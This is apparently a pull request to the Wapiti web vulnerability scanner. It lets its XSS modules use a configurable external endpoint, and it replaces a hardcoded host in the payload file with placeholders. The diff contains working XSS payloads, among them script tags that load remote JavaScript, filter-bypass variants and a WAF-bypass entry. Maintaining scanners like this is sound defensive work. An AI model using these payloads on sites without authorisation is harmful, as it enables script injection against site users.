### PR TITLE
Fix xss modules and payloads to support custom endpoints

### DIFF
--- a/wapitiCore/attack/mod_permanentxss.py
+++ b/wapitiCore/attack/mod_permanentxss.py
@@ -181,7 +181,7 @@ class mod_permanentxss(Attack):
                 # Ok the content is stored, but will we be able to inject javascript?
                 else:
                     parameter = self.tried_xss[taint][1]
-                    payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE)
+                    payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE, self.external_endpoint)
                     flags = self.tried_xss[taint][2]
 
                     # TODO: check that and make it better

--- a/wapitiCore/attack/mod_xss.py
+++ b/wapitiCore/attack/mod_xss.py
@@ -85,7 +85,7 @@ class mod_xss(Attack):
                 # even if the Content-Type seems uninteresting.
                 if taint.lower() in response.content.lower() and valid_xss_content_type(mutated_request):
                     # Simple text injection worked in HTML response, let's try with JS code
-                    payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE)
+                    payloads = generate_payloads(response.content, taint, self.PAYLOADS_FILE, self.external_endpoint)
 
                     # TODO: check that and make it better
                     if flags.method == PayloadType.get:

--- a/wapitiCore/data/attacks/xssPayloads.ini
+++ b/wapitiCore/data/attacks/xssPayloads.ini
@@ -48,17 +48,19 @@ case_sensitive = yes
 
 ; I saw webpages cuttings words on uppercase letters so let's keep only the S uppercase
 [script_absolute_src]
-payload = <Script src=https://wapiti3.ovh/__XSS__z.js></Script>
+; payload = <Script src=https://wapiti3.ovh/__XSS__z.js></Script>
+payload = <Script src=[EXTERNAL_ENDPOINT]__XSS__z.js></Script>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+; value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [script_protocol_src]
-payload = <ScRiPt src=//wapiti3.ovh/__XSS__z.js></ScRiPt>
+payload = <ScRiPt src=//[PROTO_ENDPOINT]__XSS__z.js></ScRiPt>
 tag = script
 attribute = src
-value = //wapiti3.ovh/__XSS__z.js
+value = //[PROTO_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [script_alert_parentheses_regex]
@@ -175,19 +177,19 @@ case_sensitive = yes
 ; Tricks
 ; Those are simple case sensitive bypass
 [case_script_slash_absolute_src]
-payload = <ScRiPt/src=https://wapiti3.ovh/__XSS__z.js></sCrIpT/>
+payload = <ScRiPt/src=[EXTERNAL_ENDPOINT]__XSS__z.js></sCrIpT/>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 
 ; Try injecting whitespaces...
 [case_tab_script_absolute_src]
-payload = <ScRiPt[TAB]src=https://wapiti3.ovh/__XSS__z.js></sCrIpT>
+payload = <ScRiPt[TAB]src=[EXTERNAL_ENDPOINT]__XSS__z.js></sCrIpT>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [tab_img_onerror_alert]
@@ -229,17 +231,17 @@ case_sensitive = yes
 match_type = starts_with
 
 [open_script_tag_remove_absolute_src]
-payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></script>
+payload = <scr<script>ipt src=[EXTERNAL_ENDPOINT]__XSS__z.js></script>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [script_tag_remove_absolute_src]
-payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></scr</script>ipt>
+payload = <scr<script>ipt src=[EXTERNAL_ENDPOINT]__XSS__z.js></scr</script>ipt>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [cloudflare_bypass]
@@ -257,10 +259,10 @@ value = confirm(/__XSS__/)
 case_sensitive = yes
 
 [bypass_script_absolute_src]
-payload = <Script e=">" src="https://wapiti3.ovh/__XSS__z.js"></Script>
+payload = <Script e=">" src="[EXTERNAL_ENDPOINT]__XSS__z.js"></Script>
 tag = script
 attribute = src
-value = https://wapiti3.ovh/__XSS__z.js
+value = [EXTERNAL_ENDPOINT]__XSS__z.js
 case_sensitive = no
 
 [img_onerror_bypass_some_removals]


### PR DESCRIPTION
XSS modules will use the external endpoint (by default https://wapiti3.ovh/) specified via `--external-endpoint` option.
Replaced all hard coded urls in xssPayloads.ini by [EXTERNAL_ENDPOINT] or [PROTO_ENDPOINT]. 
These values are then replaced in load_payloads_from_ini method (from xss_utils.py) with the external endpoint value when generate_payloads method is called.
Fix https://github.com/wapiti-scanner/wapiti/issues/108